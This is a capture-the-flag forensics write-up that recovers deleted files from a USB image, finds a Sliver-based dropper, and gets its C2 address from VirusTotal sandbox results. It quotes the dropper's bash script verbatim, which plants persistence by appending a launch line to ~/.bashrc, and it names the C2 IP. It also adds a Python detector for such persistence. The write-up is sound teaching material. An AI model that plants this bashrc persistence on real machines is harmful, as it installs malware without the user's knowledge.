Challenge Overview

The provided file is an image of a flash drive that probably contains malware. The goal is to find the C2 website.

➜ file drive.img

drive.img: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "mkfs.fat", sectors/cluster 8, Media descriptor 0xf8, sectors/track 63, heads 128, sectors 4194288 (volumes > 32 MB), FAT (32 bit), sectors/FAT 4088, reserved 0x1, serial number 0xcc9e321, unlabeled

We can extract the contents of the image using the testdisk tool. We select the Analyze option to search for files contained in the image.

Testdisk

Several files were deleted, but the tool can recover them. We can extract them by pressing a to select all files and C to copy them.

Deleted

We get 5 different files:

➜ file *

_~1.SH:                Bourne-Again shell script, ASCII text executable
_DF~1.PNG:             PNG image data, 36 x 36, 16-bit/color RGB, non-interlaced
Important.pdf.desktop: ASCII text
_IREFO~1.ELF:          ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
_MPORT~1.PDF:          PDF document, version 1.6 (password protected)

The bash script copies the firefox.elf file to the user's home directory and appends a line to ~/.bashrc so that the copy is launched every time a terminal is opened. And yes, firefox.elf is malware!

➜ cat _\~1.SH
#!/bin/bash

echo -e "# Launch the best browser\n~/.firefox &" >> ~/.bashrc
cp ./.firefox.elf ~/.firefox
source ~/.bashrc
evince ./.important.pdf

# rm -rf ./Important.pdf.desktop

Among the recovered files, there is an ELF file that seems to be the firefox malware. The strings tool displays a GitHub link to the following repository:

  • https://github.com/bishopfox/sliver/

Sliver is an open source, cross-platform adversary emulation/red team framework; it can be used by organizations of all sizes to perform security testing. Sliver's implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS and are dynamically compiled with per-binary asymmetric encryption keys.

➜ strings _IREFO\~1.ELF

PeerFailureType
SEND_FAILURE
DISCONNECT
B/Z-github.com/bishopfox/sliver/protobuf/sliverpbb
proto3
A A!A"A#A$A%A&A'A(A)A*A+A,A-A.A/A0A1A2A3A4A5A6A7A8A9A:A;A<A=A>A?
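
As an added triage example (not part of the original writeup), the two checks this section relies on: a strings-style extraction that flags the Sliver protobuf path inside the implant, and a scan of the recovered dropper script for lines that append a command to a shell startup file. The sample bytes and the marker list are constructed for the example; the dropper text is the script quoted above.

```python
import re

# Constructed sample: the dropper script recovered from the image (as quoted above).
DROPPER_SH = r"""#!/bin/bash

echo -e "# Launch the best browser\n~/.firefox &" >> ~/.bashrc
cp ./.firefox.elf ~/.firefox
source ~/.bashrc
evince ./.important.pdf
"""

# Constructed stand-in for the implant: a few junk bytes around the
# Sliver protobuf path that `strings` printed on the real binary.
FAKE_ELF = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"PeerFailureType\x00"
            + b"\x01\x02" + b"B/Z-github.com/bishopfox/sliver/protobuf/sliverpbb\x00"
            + b"proto3\x00")

# Hypothetical marker list: strings that identify the framework, not its C2.
SLIVER_MARKERS = ("github.com/bishopfox/sliver", "sliverpb")

def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Mimic `strings`: runs of printable ASCII at least min_len bytes long."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def sliver_hits(data: bytes) -> list:
    """Return the extracted strings that contain a known Sliver marker."""
    return [s for s in extract_strings(data) if any(m in s for m in SLIVER_MARKERS)]

# An echo/printf whose output is appended (>>) to a shell rc file.
RC_APPEND = re.compile(
    r"^\s*(?:echo|printf)\b(?P<payload>.*?)>>\s*(?P<rc>\S*\.(?:bashrc|profile|zshrc))",
    re.M)

def rc_persistence(script: str) -> list:
    """Flag dropper lines that persist a command through a shell startup file."""
    hits = []
    for m in RC_APPEND.finditer(script):
        hits.append({"rc_file": m.group("rc"),
                     "payload": m.group("payload").strip(),
                     "line": m.group(0).strip()})
    return hits

if __name__ == "__main__":
    print("Sliver markers:", sliver_hits(FAKE_ELF))
    for h in rc_persistence(DROPPER_SH):
        print("persistence via", h["rc_file"], "->", h["payload"])
```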

The malware is a dropper generated with Sliver, so it is very difficult to decompile with Ghidra to determine the C2 address. Another idea is dynamic analysis: launch the malware in a sandbox and analyze its network traffic to determine the connections it makes. A free service that can do this is VirusTotal (https://www.virustotal.com/). We upload our malware to it and it does the job.

VirusTotal

The BEHAVIOR tab is the one we are looking for, as the results of the dynamic analysis are here.

We find that the virus has connected to the following IP address:

  • 178.62.67.181

IP

➜ curl 178.62.67.181:443

<img src="https://i.imgur.com/ZAdeHIb.png" alt="Mewtal Gear Solid">

And there is the flag!

Flag

  • PWNME{1_L0V3_5L1V3R}